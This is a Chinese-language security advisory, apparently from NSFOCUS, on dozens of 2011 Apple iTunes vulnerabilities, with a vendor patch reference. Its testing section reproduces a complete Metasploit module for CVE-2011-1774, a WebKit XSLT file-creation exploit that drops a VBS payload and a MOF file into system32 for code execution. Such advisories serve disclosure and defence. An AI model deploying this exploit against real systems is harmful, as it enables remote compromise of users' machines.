安全研究
安全漏洞
Apple iTunes多个安全漏洞
发布日期:2011-10-13
更新日期:2011-10-13
受影响系统:
Apple iTunes 10.x描述:
CVE ID: CVE-2010-1823,CVE-2011-0164,CVE-2011-0200,CVE-2011-0204,CVE-2011-0215,CVE-2011-0218,CVE-2011-0221,CVE-2011-0222,CVE-2011-0223,CVE-2011-0225,CVE-2011-0232,CVE-2011-0233,CVE-2011-0234,CVE-2011-0235,CVE-2011-0237,CVE-2011-0238,CVE-2011-0240,CVE-2011-0253,CVE-2011-0254,CVE-2011-0255,CVE-2011-0259,CVE-2011-0981,CVE-2011-0983,CVE-2011-1109,CVE-2011-1114,CVE-2011-1115,CVE-2011-1117,CVE-2011-1121,CVE-2011-1188,CVE-2011-1203,CVE-2011-1204,CVE-2011-1288,CVE-2011-1293,CVE-2011-1296,CVE-2011-1440,CVE-2011-1449,CVE-2011-1451,CVE-2011-1453,CVE-2011-1457,CVE-2011-1462,CVE-2011-1774,CVE-2011-1797,CVE-2011-2338,CVE-2011-2339,CVE-2011-2341,CVE-2011-2351,CVE-2011-2352,CVE-2011-2354,CVE-2011-2356,CVE-2011-2359,CVE-2011-2788,CVE-2011-2790,CVE-2011-2792,CVE-2011-2797,CVE-2011-2799,CVE-2011-2809,CVE-2011-2811,CVE-2011-2813,CVE-2011-2814,CVE-2011-2815,CVE-2011-2816,CVE-2011-2817,CVE-2011-2818,CVE-2011-2820,CVE-2011-2823,CVE-2011-2827,CVE-2011-2831,CVE-2011-3219,CVE-2011-3232,CVE-2011-3233,CVE-2011-3234,CVE-2011-3235,CVE-2011-3236,CVE-2011-3237,CVE-2011-3238,CVE-2011-3239,CVE-2011-3241,CVE-2011-3244,CVE-2011-3252
iTunes是一款媒体播放器的应用程序,2001年1月10日由苹果电脑在旧金山的Macworld Expo推出,用来播放以及管理数字音乐和与视频文件,是管理苹果iPod的文件的主要工具。
Apple iTunes在实现上存在多个漏洞,可被恶意用户利用泄露敏感信息,操作某些数据、执行跨站脚本和欺骗攻击、绕过某些安全限制、控制用户系统。
1)在处理字符串标志化时,CoreFoundation组件中存在错误,通过中间人攻击破坏内存。
2)处理AAC流时CoreAudio组件中存在错误,可造成缓冲区溢出。
3)处理H.264编码文件时CoreMedia组件中存在错误,可造成缓冲区溢出。
4)使用AddressSanitizer时WebKit组件中存在错误,可造成内存破坏;
5)WebKit组件的多个错误可被利用破坏内存。
<*来源:vendor
链接:http://support.apple.com/kb/HT4981
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.exploit-db.com/download/17993
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation',
'Description' => %q{
This module exploits a file creation vulnerability in the Webkit
rendering engine. It is possible to redirect the output of a XSLT
transformation to an arbitrary file. The content of the created file must be
ASCII or UTF-8. The destination path can be relative or absolute. This module
has been tested on Safari and Maxthon. Code execution can be acheived by first
uploading the payload to the remote machine in VBS format, and then upload a MOF
file, which enables Windows Management Instrumentation service to execute the VBS.
},
'License' => MSF_LICENSE,
'Author' => ['Nicolas Gregoire'],
'Version' => '$Revision: 13987 $',
'References' =>
[
['CVE', '2011-1774'],
['OSVDB', '74017'],
['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'],
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
'Targets' =>
[
#Windows before Vista
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 20 2011'))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Check target before attacking
agent = request.headers['User-Agent']
if agent !~ /Windows NT 5\.1/ or agent !~ /Safari/ or agent !~ /Version\/5\.0\.\d/
print_error("This target isn't supported: #{agent.to_s}")
send_not_found(cli)
return
end
url = "http://"
url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
url += ":" + datastore['SRVPORT'] + get_resource() + "/"
content = <<-EOS
<?xml-stylesheet type="text/xml" href="#fragment"?>
<!-- Define the DTD of the document
This is needed, in order to later reference the XSLT stylesheet by a #fragment
This trick allows to have both the XML and the XSL in the same file
Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html -->
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED
>]>
<doc>
<!-- Define location and content of the files -->
<mof>
<location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\wbem\\mof\\#{@mof_name}]]></location>
<content><![CDATA[#{@mof_content}]]></content>
</mof><vbs>
<location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\#{@vbs_name}]]></location>
<content><![CDATA[#{@vbs_content}]]></content>
</vbs>
<!-- The XSLT stylesheet header, including the "sx" extension -->
<xsl:stylesheet id="fragment" version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:sx="http://icl.com/saxon"
extension-element-prefixes="sx"
xmlns="http://www.w3.org/1999/xhtml" >
<xsl:output method="xml" indent="yes" />
<!-- The XSLT template -->
<xsl:template match="/">
<!-- Define some XSLT variables -->
<xsl:variable name="moflocation" select="//mof/location/text()"/>
<xsl:variable name="vbslocation" select="//vbs/location/text()"/>
<!-- Create the files -->
<sx:output file="{$vbslocation}" method="text">
<xsl:value-of select="//vbs/content"/>
</sx:output>
<sx:output file="{$moflocation}" method="text">
<xsl:value-of select="//mof/content"/>
</sx:output>
<!-- Some output to the browser -->
<html> </html>
</xsl:template>
</xsl:stylesheet>
</doc>
EOS
#Clear the extra tabs
content = content.gsub(/^\t\t/, '')
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, content, {'Content-Type'=>'application/xml'})
handler(cli)
end
def exploit
# In order to save binary data to the file system the payload is written to a VBS
# file and execute it from there via a MOF
@mof_name = rand_text_alpha(rand(5)+5) + ".mof"
@vbs_name = rand_text_alpha(rand(5)+5) + ".vbs"
print_status("Encoding payload into vbs...")
payload = generate_payload_exe
@vbs_content = Msf::Util::EXE.to_exe_vbs(payload)
print_status("Generating mof file...")
@mof_content = generate_mof(@mof_name, @vbs_name)
super
end
end
建议:
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://support.apple.com/
浏览次数:3490
严重程度:0(网友投票)
绿盟科技给您安全的保障